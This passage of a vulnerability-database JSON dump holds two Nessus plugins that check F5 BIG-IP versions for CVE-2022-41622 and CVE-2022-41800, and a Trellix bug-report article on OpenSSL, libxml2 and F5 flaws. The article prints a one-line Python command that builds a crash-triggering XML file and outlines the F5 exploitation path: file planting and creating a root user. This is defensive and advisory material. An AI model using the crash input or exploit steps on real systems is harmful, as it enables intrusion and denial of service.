"description": "The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the K94221585 advisory.\n\n - In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. 
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. (CVE-2022-41622)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-16T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : iControl SOAP vulnerability (K94221585)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41622"], "modified": "2023-03-21T00:00:00", "cpe": ["cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*", "cpe:2.3:h:f5:big-ip_protocol_security_manager:*:*:*:*:*:*:*:*", "cpe:2.3:h:f5:big-ip:*:*:*:*:*:*:*:*"], "id": "F5_BIGIP_SOL94221585.NASL", "href": "https://www.tenable.com/plugins/nessus/167739", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K94221585.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167739);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2023/03/21\");\n\n script_cve_id(\"CVE-2022-41622\");\n script_xref(name:\"IAVA\", value:\"2023-A-0060\");\n\n script_name(english:\"F5 Networks BIG-IP : iControl SOAP vulnerability (K94221585)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by\na vulnerability as referenced in the K94221585 advisory.\n\n - In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through\n iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not\n evaluated. (CVE-2022-41622)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K94221585\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K94221585.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41622\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP iControl CSRF File Write SOAP API');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/11/16\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! 
version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K94221585';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'APM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'ASM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'DNS': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'GTM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'LTM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'PEM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'PSM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'WOM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-25T14:40:13", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to tested 
version. It is, therefore, affected by a vulnerability as referenced in the K13325942 advisory.\n\n - In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. (CVE-2022-41800)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.7, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.8}, "published": "2022-11-16T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Appliance mode iControl REST vulnerability (K13325942)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41800"], "modified": "2023-03-21T00:00:00", "cpe": ["cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_wan_optimization_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*", "cpe:2.3:h:f5:big-ip_protocol_security_manager:*:*:*:*:*:*:*:*", "cpe:2.3:h:f5:big-ip:*:*:*:*:*:*:*:*"], "id": "F5_BIGIP_SOL13325942.NASL", "href": 
"https://www.tenable.com/plugins/nessus/167738", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K13325942.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167738);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/21\");\n\n script_cve_id(\"CVE-2022-41800\");\n script_xref(name:\"IAVA\", value:\"2023-A-0060\");\n\n script_name(english:\"F5 Networks BIG-IP : Appliance mode iControl REST vulnerability (K13325942)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to tested version. It is, therefore, affected by\na vulnerability as referenced in the K13325942 advisory.\n\n - In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the\n Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl\n REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software\n versions which have reached End of Technical Support (EoTS) are not evaluated. 
(CVE-2022-41800)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K13325942\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K13325942.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:M/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41800\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP iControl Authenticated RCE via RPM Creator');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! 
get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K13325942';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'APM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'ASM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'DNS': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'GTM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'LTM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'PEM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'PSM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n },\n 'WOM': {\n 'affected': [\n '17.0.0','16.1.0-16.1.3','15.1.0-15.1.8','14.1.0-14.1.5','13.1.0-13.1.5'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "trellix": [{"lastseen": "2022-12-07T00:00:00", "description": "# The Bug Report \u2014 November 2022 Edition\n\nBy Austin Emmitt \u00b7 December 07, 2022\n\n Like granny always said, \u201cnever hack on an empty stomach.\u201d \n\n\n## Why am I here?\n\nThis year I am thankful for some 
vivifying vulnerabilities and exceptional exploits! The world of enterprise software security is certainly not slowing down as the holidays approach, so there is plenty of delicious content to gobble up in this month\u2019s Bug Report, our quick and easily digested list of the most important bugs of the last 30 days. November was a capacious cornucopia of interesting infosec, so let's break down a few of the most significant bits:\n\n * CVE-2022-3786 + CVE-2022-3602: OpenSSL 3.0\n * CVE-2022-40303 + CVE-2022-40304: libxml2\n * CVE-2022-41622 + CVE-2022-41800: F5 BIG-IP\n\nAlthough the vulns in OpenSSL 3.0 were announced the last week of October and feel like they happened forever ago at this point, they weren\u2019t publicly disclosed until the first of November, meaning they just barely didn\u2019t make it into last month\u2019s Spooky Edition. Sorry for any confusion!\n\n## CVE-2022-3786 + CVE-2022-3602: \u201cSpookySSL\u201d overflows\n\n### What is it?\n\nNovember flew in with a SQUAWK as new \u201ccritical\u201d vulnerabilities were announced in OpenSSL 3.0 in the last week of October before being disclosed on the first. CVE-2022-3786 and CVE-2022-3602 were discovered by Viktor Dukhovni and [Polar Bear (aka Sandbox Escaper)](<https://sandboxescaper.blogspot.com/p/disclosures_8.html>), respectively, and involve buffer overflows in the process of [X.509 certificate](<https://en.wikipedia.org/wiki/X.509>) verification.\n\n### Who cares?\n\nEveryone was on the edge of their dining room chairs fearing that this could be HeartBleed 2.0, an easily exploited bug that could lead to disclosure of sensitive information or worse, full control over the victim machine. Luckily, these two bugs turned out to be difficult-to-impossible to exploit due to modern mitigations, and they required that the certificate come from a trusted authority (or that the verification process continue despite trust errors). 
Combined, these requirements led the vulnerabilities to be lowered in severity from \u201ccritical\u201d to \u201chigh.\u201d However, these are still significant bugs due to the ubiquitous usage of OpenSSL, though many may still be on versions earlier than 3.0, which are not affected.\n\n### What can I do?\n\n Phil Swift asks that you patch ASAP \n\n\nFrom OpenSSL.org: \u201cUsers of OpenSSL 3.0.0 - 3.0.6 are encouraged to upgrade to 3.0.7 as soon as possible. If you obtain your copy of OpenSSL from your Operating System vendor or other third party then you should seek to obtain an updated version from them as soon as possible.\u201d\n\n## CVE-2022-40303 + CVE-2022-40304: Xml parsing vulnerabilities just in time for xmas\n\n### What is it?\n\nThere are some new XML vulns just in time for the Xmas season. Maddie Stone, Ned Williamson, and Nathan Wachholz of Google Project Zero disclosed multiple vulnerabilities in libxml2, a widely used XML parser developed for GNOME. Maddie Stone discovered an [integer overflow in the function xmlParseNameComplex](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2336>) (CVE-2022-40303) that can be triggered by including a name that is 0x80000000 bytes or more long. A sample file to reproduce this crash can be crafted very simply with: \n\n \n \n python3 -c 'print(\"<!DOCTYPE doc [\\n<!ATTLIST src \" + \"a\"*(0x80000000) + \" IDREF #IMPLIED>\")' > name_big.xml\n\nCVE-2022-40304 is another vulnerability in libxml2, but caused by entity reference cycles being handled improperly for dicts, leading to memory corruption. The [commit message of the fix](<https://gitlab.gnome.org/GNOME/libxml2/-/commit/1b41ec4e9433b05bb0376be4725804c54ef1d80b>) for this bug reads: \u201cWhen an entity reference cycle is detected, the entity content is cleared by setting its first byte to zero. But the entity content might be allocated from a dict. 
In this case, the dict entry becomes corrupted leading to all kinds of logic errors, including memory errors like double-frees.\u201d\n\n### Who cares?\n\nThe above issues may be interesting targets for attackers as libxml2 is used in many applications, including Webkit, which prompted Apple to release [MacOS 13.0.1](<https://support.apple.com/en-us/HT213504>) and [iOS 16.1.1](<https://support.apple.com/en-us/HT213505>) to address them. Worryingly, these vulnerabilities could lead to arbitrary code execution in the process parsing an attacker-controlled XML document. While CVE-2022-40303 requires that the \u201cXML_PARSE_HUGE\u201d option be enabled for the library to be vulnerable \u2013 as it requires parsing a 2GB+ file \u2013 there is no such requirement for the reference cycle issue.\n\n### What can I do?\n\nDevelopers should update libxml2 dependencies to [version 2.10.3](<https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.10.3>), which has patched the vulnerabilities. Apple users should also update to MacOS 13.0.1 and iOS 16.1.1 to address these vulnerabilities on those platforms.\n\n## CVE-2022-41622 + CVE-2022-41800: Are they a big deal?\n\n### What is it?\n\n[Rapid 7 discovered two vulnerabilities in F5 BIG-IP and iControl](<https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/>) that can lead to remote code execution (RCE). CVE-2022-41622 is a cross-site request forgery (CSRF) vulnerability that can lead to unauthenticated RCE! A chill just ran up my spine, and I have the heat cranking! This issue exists because the endpoint \u201c/iControl/iControlPortal.cgi\u201d did not have any protection against CSRF. 
This endpoint provides several APIs, including upload_file and create_user capabilities.\n\nCVE-2022-41800, on the other hand, is an \u201cRPM Spec Injection\u201d vulnerability that can result in authenticated RCE; the \u2018authenticated\u2019 qualifier is due to the vulnerability existing in an administrator-only page. By including a crafted JSON payload with an authenticated administrator session, it is possible to perform command injection.\n\n### Who cares?\n\nWhile both issues result in remote code execution, the first issue can be exploited pre-auth using CSRF by planting binaries using the upload_file API. During exploitation, this was used to create a file at \u201c/shared/f5_update_action,\u201d which is executed two minutes after boot. Additionally, the iControlPortal.cgi script is setuid root, allowing the same vulnerability to be exploited with the create_user action to create a new root user which could then be used to login via SSH. Both of the above techniques can be seen in the [PoC on GitHub](<https://github.com/rbowes-r7/refreshing-soap-exploit>). Despite the seriousness of these vulnerabilities, Rapid7 claims that \u201cwidespread exploitation of the issues in this disclosure is unlikely\u201d due to the multiple requirements that all must be satisfied in order to be exploited. These include targeting a user that has an authenticated session to the control interface, or already having credentialled access to the server. With this in mind, affected users don\u2019t need to stay up late hitting F5 waiting for patches!\n\n### What can I do?\n\nF5 responded to these disclosures by asking users to evaluate their risk given the limitations of the vulnerabilities and said they would make engineering hotfixes available upon request. Proper fixes will be included in a future release. 
Thankfully, F5 has stated that there has been no indication of these vulnerabilities being actively exploited.\n\n_This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. _\n", "cvss3": {}, "published": "2022-12-07T00:00:00", "type": "trellix", "title": "The Bug Report \u2013 November 2022 Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-3602", "CVE-2022-3786", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-12-07T00:00:00", "id": "TRELLIX:D11572BEEA987F8F8C27E6F40965167E", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-november-2022-edition.html", "cvss": {"score": 0.0, "vector": "NONE"}}]}